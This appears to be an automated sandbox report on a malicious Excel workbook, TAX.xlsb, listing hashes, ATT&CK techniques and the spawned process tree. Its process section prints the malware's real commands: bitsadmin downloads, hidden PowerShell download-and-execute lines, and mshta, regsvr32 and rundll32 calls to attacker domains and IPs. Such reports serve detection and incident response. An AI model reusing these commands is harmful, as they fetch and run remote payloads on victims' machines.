ea0923854208956b1f563c5301bd0c9a8561128b7bd48c5b475ddeea29da8a1c

General

Target

TAX.xlsb
Size

10KB
MD5

1e1afc93c8092b2c7e49a6d3a451629f
SHA1

081d3ab46a0641d952ca28eacc6d4ef3516fdfd0
SHA256

ea0923854208956b1f563c5301bd0c9a8561128b7bd48c5b475ddeea29da8a1c
SHA512

5ca2f6827fc93c7645660d3f787c1d074596ecd90b5b7c03748f46def274dc1d4edb931251202a9c50fb925ba2c9dda855cd42a0c90d7c313f24aaa93823150d
SSDEEP

192:F5ssEP3p0o7VhgmK05bVhvtrWNpUAWvXSRo1jdF:3ssGZ0o7VhVK+hvwNmvV

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://kilolo.site/raw.txt

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://kilolo.site/raw.txt

Extracted

Language

hta

Source

URLs

hta.dropper

http://37.72.175.188:80/home

Signatures

Process spawned unexpected child process 11 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.execmd.execmd.execmd.exepowershell.exepowershell.exemshta.execmd.execmd.exeregsvr32.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4676	4260	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1764	4260	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1952	4260	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1612	4260	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1904	4260	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1964	4260	powershell.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4420	4260	powershell.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4000	4260	mshta.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4964	4260	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4916	4260	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2652	4260	regsvr32.exe	EXCEL.EXE

Blocklisted process makes network request 1 IoCs

Processes:

mshta.exe

flow pid process

24 4000 mshta.exe

flow	pid	process
24	4000	mshta.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Download via BitsAdmin 1 TTPs 3 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exebitsadmin.exebitsadmin.exe

pid process

1528 bitsadmin.exe
3504 bitsadmin.exe
1396 bitsadmin.exe

pid	process
1528	bitsadmin.exe
3504	bitsadmin.exe
1396	bitsadmin.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4260 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

1964 powershell.exe
4420 powershell.exe
1964 powershell.exe
1964 powershell.exe
4420 powershell.exe
4420 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1964 powershell.exe
Token: SeDebugPrivilege 4420 powershell.exe

pid	process
1964	powershell.exe
4420	powershell.exe
1964	powershell.exe
1964	powershell.exe
4420	powershell.exe
4420	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1964	powershell.exe
Token: SeDebugPrivilege	4420	powershell.exe

Suspicious use of SetWindowsHookEx 13 IoCs

Processes:

EXCEL.EXE

pid	process
4260	EXCEL.EXE
4260	EXCEL.EXE
4260	EXCEL.EXE
4260	EXCEL.EXE
4260	EXCEL.EXE
4260	EXCEL.EXE
4260	EXCEL.EXE
4260	EXCEL.EXE
4260	EXCEL.EXE
4260	EXCEL.EXE
4260	EXCEL.EXE
4260	EXCEL.EXE
4260	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

EXCEL.EXEcmd.execmd.execmd.exe

description	pid	process	target process
PID 4260 wrote to memory of 1764	4260	EXCEL.EXE	cmd.exe
PID 4260 wrote to memory of 1764	4260	EXCEL.EXE	cmd.exe
PID 4260 wrote to memory of 4676	4260	EXCEL.EXE	cmd.exe
PID 4260 wrote to memory of 4676	4260	EXCEL.EXE	cmd.exe
PID 4260 wrote to memory of 1952	4260	EXCEL.EXE	cmd.exe
PID 4260 wrote to memory of 1952	4260	EXCEL.EXE	cmd.exe
PID 4260 wrote to memory of 1612	4260	EXCEL.EXE	cmd.exe
PID 4260 wrote to memory of 1612	4260	EXCEL.EXE	cmd.exe
PID 4260 wrote to memory of 1904	4260	EXCEL.EXE	cmd.exe
PID 4260 wrote to memory of 1904	4260	EXCEL.EXE	cmd.exe
PID 4260 wrote to memory of 4916	4260	EXCEL.EXE	cmd.exe
PID 4260 wrote to memory of 4916	4260	EXCEL.EXE	cmd.exe
PID 4260 wrote to memory of 4964	4260	EXCEL.EXE	cmd.exe
PID 4260 wrote to memory of 4964	4260	EXCEL.EXE	cmd.exe
PID 4260 wrote to memory of 4420	4260	EXCEL.EXE	powershell.exe
PID 4260 wrote to memory of 4420	4260	EXCEL.EXE	powershell.exe
PID 4260 wrote to memory of 1964	4260	EXCEL.EXE	powershell.exe
PID 4260 wrote to memory of 1964	4260	EXCEL.EXE	powershell.exe
PID 4260 wrote to memory of 4000	4260	EXCEL.EXE	mshta.exe
PID 4260 wrote to memory of 4000	4260	EXCEL.EXE	mshta.exe
PID 1904 wrote to memory of 1528	1904	cmd.exe	bitsadmin.exe
PID 1904 wrote to memory of 1528	1904	cmd.exe	bitsadmin.exe
PID 1612 wrote to memory of 3504	1612	cmd.exe	bitsadmin.exe
PID 1612 wrote to memory of 3504	1612	cmd.exe	bitsadmin.exe
PID 4676 wrote to memory of 1396	4676	cmd.exe	bitsadmin.exe
PID 4676 wrote to memory of 1396	4676	cmd.exe	bitsadmin.exe
PID 4260 wrote to memory of 2652	4260	EXCEL.EXE	regsvr32.exe
PID 4260 wrote to memory of 2652	4260	EXCEL.EXE	regsvr32.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\TAX.xlsb"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4260

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/admin.bat c:\Intel\admin.bat
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4676

C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer myjob /download /priority high https://kilolo.site/admin.bat c:\Intel\admin.bat
3⤵
- Download via BitsAdmin
PID:1396

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c cd c:\&&mkdir Intel
2⤵
- Process spawned unexpected child process
PID:1764

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c cd c:\Intel&&timeout /t 15&&c:\Intel\admin.bat
2⤵
- Process spawned unexpected child process
PID:1952

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.bin c:\Intel\mer.bin
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1612

C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.bin c:\Intel\mer.bin
3⤵
- Download via BitsAdmin
PID:3504

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.dll c:\Intel\mer.dll
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1904

C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.dll c:\Intel\mer.dll
3⤵
- Download via BitsAdmin
PID:1528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('https://kilolo.site/raw.txt'))
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://kilolo.site/raw.txt'))
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4420

C:\Windows\SYSTEM32\mshta.exe
mshta http://37.72.175.188:80/home
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
PID:4000

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c cd c:\Intel&&timeout /t 15&& copy mer.dll mery.dll&&rundll32.exe mer.dll,Run https://38.132.124.172:443/&regsvr3
2⤵
- Process spawned unexpected child process
PID:4964

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c cd c:\Intel&&timeout /t 15&&rename mer.bin mer.exe&&mer.exe
2⤵
- Process spawned unexpected child process
PID:4916

C:\Windows\SYSTEM32\regsvr32.exe
regsvr32 /s /u /n /i:http://37.72.175.188:443/index scrobj
2⤵
- Process spawned unexpected child process
PID:2652

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

BITS Jobs

1

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

1

T1197

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
49e7d5f2a296b59afec08bc314bed998

SHA1
7f898bf195ffd46ce2d19fad0ce33155f6e47f5f

SHA256
394832dfefa5e2e6204b60708a2ca33bb9d2f529664419bc050975f4b80faefe

SHA512
f64579fdac0bfebad4c20ad575b8ea45136e295fba950da4cbf84402228a3897b2e2deb4eb4605deb5df93321b1dc15c8a878da36016d7e5e060182142fdf839

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i1yrygnr.ult.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
6KB

MD5
13a6db759b138f1510229709d38231f1

SHA1
4e6204c56c133c78362c12d6969a50a77c5abfc8

SHA256
575d8625af53ee28b9ab26b1882e5bb668f07f4aec7ae05cd1e22124208ea3b7

SHA512
f5955097bd9fb2ad71a8626b6fee491e94f54b31c70a1c097be39d8c9648aae050593344ec50a62e0e3e857896a5caf115a6e5dfefb99d499e0ede05195d284a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
6KB

MD5
00fed8dd4996964149c74d7cb47fb8d3

SHA1
eb96268a1da01a24b36a4fccb62195529f509283

SHA256
161a3bde696294af73b06de3960654d19608480d9056a7ba1dbdaa99a9a3e20a

SHA512
a306dffdf7f1ef5077fb087a6aa7e83c4382207cdc191bf54af6b80e6c3b7e07b9ff1d894155bb7193ad3cdcf26d75b06965aa96fc501b77b4174b3c5339ee05

Download Submit
memory/1964-178-0x0000028226340000-0x0000028226350000-memory.dmp

Filesize
64KB

Download
memory/1964-177-0x0000028226340000-0x0000028226350000-memory.dmp

Filesize
64KB

Download
memory/4260-137-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmp

Filesize
64KB

Download
memory/4260-139-0x00007FFAB4000000-0x00007FFAB4010000-memory.dmp

Filesize
64KB

Download
memory/4260-138-0x00007FFAB4000000-0x00007FFAB4010000-memory.dmp

Filesize
64KB

Download
memory/4260-196-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmp

Filesize
64KB

Download
memory/4260-133-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmp

Filesize
64KB

Download
memory/4260-199-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmp

Filesize
64KB

Download
memory/4260-198-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmp

Filesize
64KB

Download
memory/4260-136-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmp

Filesize
64KB

Download
memory/4260-135-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmp

Filesize
64KB

Download
memory/4260-197-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmp

Filesize
64KB

Download
memory/4260-134-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmp

Filesize
64KB

Download
memory/4420-170-0x000001DB97640000-0x000001DB97662000-memory.dmp

Filesize
136KB

Download
memory/4420-179-0x000001DBAFD70000-0x000001DBAFD80000-memory.dmp

Filesize
64KB

Download
memory/4420-176-0x000001DBAFD70000-0x000001DBAFD80000-memory.dmp

Filesize
64KB

Download
memory/4420-175-0x000001DBAFD70000-0x000001DBAFD80000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads